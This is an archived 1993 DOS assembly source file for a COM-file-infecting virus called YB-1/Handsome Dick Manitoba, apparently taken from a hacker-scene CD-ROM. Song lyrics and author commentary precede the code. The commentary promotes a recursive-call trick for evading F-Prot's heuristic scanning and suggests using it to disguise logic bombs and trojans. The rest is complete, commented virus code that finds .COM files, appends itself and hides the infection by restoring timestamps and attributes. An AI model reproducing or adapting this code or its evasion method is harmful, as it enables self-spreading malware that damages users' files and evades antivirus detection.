Collection of Hack-Phreak Scene Programs

home *** CD-ROM | disk | FTP | other *** search

/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / CRYPT17.ZIP / YB-X.ASM < prev next >

Wrap

Assembly Source File | 1993-08-11 | 16KB | 437 lines

comment # PRE-IGNITION Hey you... Tell me, what's your call name Closed, negative display Engaged on section three The acrid factories You... Putrid perfect product Proper platinum parts Proficient prototypes Steadily spew from these pipes Are you... The prime automaton Christened as YB-1 Hey you... Generated by waste Arid quarry displaced Enviro-mental squeeze Aluminum disease You... Conscious of origin Intention in the wind Atmosphere infected Descendants defected Are you... Novel stroke of design Or relics from this mine Casually, choke, Noxious nourishment Embodied, illicit cure Ground and rock and sand Come crumble tumble down Grinding round The hydraulic wheel Extraction, For ultimate greed Now... hidden from view Surveying stable shifts A feeble groove Unintentional split Then they return to work As if they're not disturbed Cybernetic beings Omniscient regiment Thriving with vigor Incessant loop An assumed order Auspicious tool Frantically, flow Spumous sediment Remedied, neurotic fuse Ground and rock and sand Come crumble tumble down Yonder sound, an echoing gong Disjunction Of their disowned song Now... some are set free Emotions flood their gaze Synthetic breed The pre-ignition phase Pre-ignition Flares up in you Pre-ignition Provokes me too. # ;********************************************************************** ; YB-5 & HANDSOME DICK MANITOBA ; AUTHOR: Köhntark; surgeon: Urnst Kouch ; ; ; Yes, another 'unremarkable' virus . . . it still will put a few more ; dollars in the accounts of the AV industry . . . ;********************************************************************** ;This virus is a simple demonstrator with a series of 'nothing' CALLS ;on virus entry which point to a end segment of recursive code which ;are is sufficient to foil F-Prot's 'heuristic'mode. It's not elegant ;clever or pretty or particularly smart, but it works. However, ;it's clear that such an arrangement of code can quickly make almost ;ANY direct action virus invisible to cursory F-Prot scanning ;which attempts to identify suspicious code on its similarity to viral ;patterns. The utility depends upon circumstance. In practice, ;we find almost no one but virus writers and anti-virus researchers ;use the 'heuristic' features of commercial programs. And very few ;of them actually pay for the software, so it can hardly be considered ;'real world'. By contrast, it has been our experience that few ;administrators or PC herdsmen have the patience or time to interpret ;heuristic analyses across numerous minutely different, yet ;idiosyncratic operating systems and platforms. The 'anti-heuristic' code ;practicality, then, lies - we feel - mostly in disguising direct ; action viruses, ---------> ;logic bombs or trojan programs for quick acts of data mutilation or ;pure harrassment. By looking at the simple implementation in YB-1/ ;Handsome Dick Manitoba virus, it's clear that this kind of disguise ;is barely 5 minutes of work for even the feeblest programmer, hence ;its utility in the above categories. In the long run, it's not ;likely to mean much difference in viral spread, although, ;it may have made a difference if included in the "Goddamn Butterflies" ;virus which was distributed in Telemate shareware packages. Most ;warnings were issued by sysops who had scanned the Telemate programs ;with F-Prot in its 'heuristic' mode, which correctly pointed out ;the nature of the virus infection. Including the outlined code from ;Handsome Dick Manitoba/YB-1, below, in the same "Goddamn Butterflies" ;virus, renders it invisible to scanning under the SAME conditions. ;This particular example does not get past TBScan's heuristic mode ;which works differently than F-Prot. MAIN SEGMENT BYTE ASSUME cs:main,ds:main,ss:nothing ;all part in one segment=com file ORG 100h ;********************************** ; fake host program ;********************************** HOST: db 0E9h,0Ah,00 ;jmp NEAR PTR VIRUS db ' ' db 090h,090h mov ah,4CH mov al,0 int 21H ;terminate normally with dos ;═════════════════════════════════════════════════════════════════════════════ ;********************************** ; VIRUS CODE STARTS HERE ;********************************** VIRUS: ;a label for the first byte of the virus call ANTI_HEUR ;30 cents worth of anti-F-Prot type call ANTI_HEUR ;heuristic analysis measures call ANTI_HEUR ;the key is the 'recursive' nature of call ANTI_HEUR ;the code pointed to be the ANTI-HEUR call ANTI_HEUR ;calls. When a certain threshold of call ANTI_HEUR ;interior 'twisting' - bytewise - occurs call ANTI_HEUR ;F-Prot gives up in heuristic mode. call ANTI_HEUR ;It's not elegant, but it's cheap call ANTI_HEUR ;insurance which call ANTI_HEUR ;works. call GET_ENTRY_PT ;<--when call is performed absolute address goes to stack ;in addition, it is unlikely these bytes will GET_ENTRY_PT: ;be used for signature recognition - unless pop si ;someone is criminally stupid. sub si,GET_ENTRY_PT - VIRUS ;fix absolute address ;************************************ ; restore 4 original bytes to file ;************************************ push si ;save si cld ;clear direction flag add si,START_CODE-VIRUS mov di,0100h movsw ;this is shorter & faster than movsw ;mov cx,04 and rep movsb pop si ;restore si call ANTI_HEUR ;another 30 cents worth of anti-F-Prot call ANTI_HEUR call ANTI_HEUR call ANTI_HEUR call ANTI_HEUR call ANTI_HEUR call ANTI_HEUR call ANTI_HEUR call ANTI_HEUR call ANTI_HEUR ;************************************ ; redirect DTA onto virus code ;************************************ lea dx,[si+ DTA - VIRUS] ;put DTA at the end of the virus for now mov ah,1ah ;set new DTA function int 21h ;************************************ ; Routines called from here ;************************************ call FIND_FILE ;get a com file to attack! ;═════════════════════════════════════════════════════════════════════════════ EXIT_VIRUS: ;************************************ ; set old DTA address ;************************************ mov ah,1ah mov dx,80h ;fix dta back to return control to int 21h ;host program EXIT_VIRUS2: ;**************************************************************** ; zero out registers for return to ; host program ;**************************************************************** mov si,0100h xor bx,bx xor ax,ax push si ;save return address in stack xor dx,dx xor si,si xor di,di ret ;back to com host ;***************************************************************** ANTI_HEUR: ;25 cents worth of anti-heuristic jmp $ + 2 ;virus strategy. Nothing code call dolt call dolt call dolt call dolt ret ;sufficient to flummox analysis. DOLT: jmp $ + 2 call dolt2 ;by recursively twisting the flow call dolt2 ;of virus instructions until the call dolt2 ;rules of F-Prot are call dolt2 ;by-passed. Actually, you can ret DOLT2: jmp $ + 2 call dolt3 ;probably use much more elegant code, call dolt3 ;but the point to be made is one of call dolt3 ;speed of implementation and simple call dolt3 ;code additions which will not complicate ret ;the work of the virus or necessitate DOLT3: jmp $ + 2 ;altering any of its actual "action" ret ;code ;═════════════════════════════════════════════════════════════════════════════ FIND_FILE: lea dx,[si + FILES_TO_INFECT - VIRUS] mov ah,4eh ;do DOS search 1st function mov cx,3fh ;search for any file, with any attributes NEXT_FILE: int 21h jc NO_MO ;return if not zero call CHECK_N_INFECT_FILE ;check file if file found mov ah,4fh ;file no good, find next function jmp NEXT_FILE ;test next file for validity NO_MO: ret ;═════════════════════════════════════════════════════════════════════════════ CHECK_N_INFECT_FILE: ;***************** ; 1-OPEN FILE ;***************** lea dx,[ si + FNAME - VIRUS] ;open the file mov ax,3D02h ;r/w access to it int 21h jc NO_GOOD ;error.. quit xchg bx,ax ;bx = file handle ;******************** ; 2-Read 1st 5 bytes ;******************** mov cx,5 ;read first 5 bytes of file lea dx,[si + START_CODE - VIRUS] ;store'em here mov ah,3Fh ;DOS read function int 21h jc NO_GOOD ;error? get next file ;********************* ; 3-CHECK FILE ;********************* mov ax,WORD PTR [si + FSIZE - VIRUS] ;get file's size add ax,FINAL - VIRUS ;add virus size to it jc NO_GOOD ;bigger then 64K:nogood cmp WORD PTR [si + START_CODE - VIRUS],'ZM' ;EXE file? je NO_GOOD ;no? good cmp BYTE PTR [si + START_CODE - VIRUS],0E9H ;compare 1st byte to near jmp jne INFECT ;not a near jmp, file ok cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h ;check for ' ' je NO_GOOD ;file ok .. infect jmp short INFECT ;**************** ; Close File ;**************** NO_GOOD: mov ah,3Eh ;close file handle int 21h ;call real int21h ret ;return INFECT: ;********************************************* ; 4-Get & Save File Attributes ;********************************************* lea dx,[si + FNAME - VIRUS] mov ax,4300h ;get file attributes in cx int 21h ;call real int21h mov WORD PTR [si + ATTR - VIRUS],cx ;save attributes ;********************************************* ; 5-Set attributes ;********************************************* and cx,0FFFFh ;set attributes to normal mov ax,4301h ;set file attributes to cx int 21h ;********************************************* ; 6-Save date and time of file to be infected ;********************************************* mov ax,5700h int 21h mov WORD PTR [si + F_DATE - VIRUS],dx mov WORD PTR [si + F_TIME - VIRUS],cx ;********************* ; 7-set PTR @EOF ;********************* xor cx,cx ;prepare to write virus on file xor dx,dx ;position file pointer,cx:dx = 0 mov ax,4202H int 21h ;********************* ; 8-append virus ;********************* mov dx,si ; start of virus mov cx,FINAL - VIRUS ; write virus to end mov ah,40h ; write to file int 21h ;********************* ; 9-set PTR @BOF ;********************* xor cx,cx xor dx,dx ;position file pointer,cx:dx = 0 mov ax,4200h ;locate pointer at beginning of host int 21h ;****************************************** ; 10-write new 4 bytes to beginning of file ;****************************************** mov ax,WORD PTR [si + FSIZE - VIRUS] sub ax,3 mov WORD PTR [si + START_IMAGE+1 - VIRUS],ax mov cx,4 ;#of bytes to write lea dx,[si+ START_IMAGE - VIRUS] ;ds:dx=pointer of data to write mov ah,40h ;DOS write function int 21h ;call real int21h ;************************************************* ; 11-Restore date and time of file to be infected ;************************************************* mov ax,5701h mov dx,WORD PTR [si + F_DATE - VIRUS] mov cx,WORD PTR [si + F_TIME - VIRUS] int 21h ;************************************************* ; 12-Restore file's attributes ;************************************************* lea dx,[si + FNAME - VIRUS] ;get filename mov cx,[si + ATTR - VIRUS] ;get old attributes mov ax,4301h ;set file attributes to cx int 21h ;**************** ; 13-Close File ;**************** NO_GOOD2: mov ah,3Eh int 21h ret ;infection done! ;═════════════════════════════════════════════════════════════════════════════ NAME_AUTHOR db 'YB-1 & Handsome Dick Manitoba / Köhntark' FILES_TO_INFECT db '*.COM',0 START_CODE db 090h,090h,090h,090h,090h ;area to store 5 bytes to w/r from / to file START_IMAGE db 0E9h,0,0,020h INT_21 dd 0 ATTR dw 0 F_DATE dw 0 F_TIME dw 0 DTA db 1Ah dup (?) FSIZE dw 0,0 ;file size storage area FNAME db 13 dup (?) ;area for file path ;═════════════════════════════════════════════════════════════════════════════ FINAL: ;label of byte of code to be kept in virus when it moves MAIN ENDS END HOST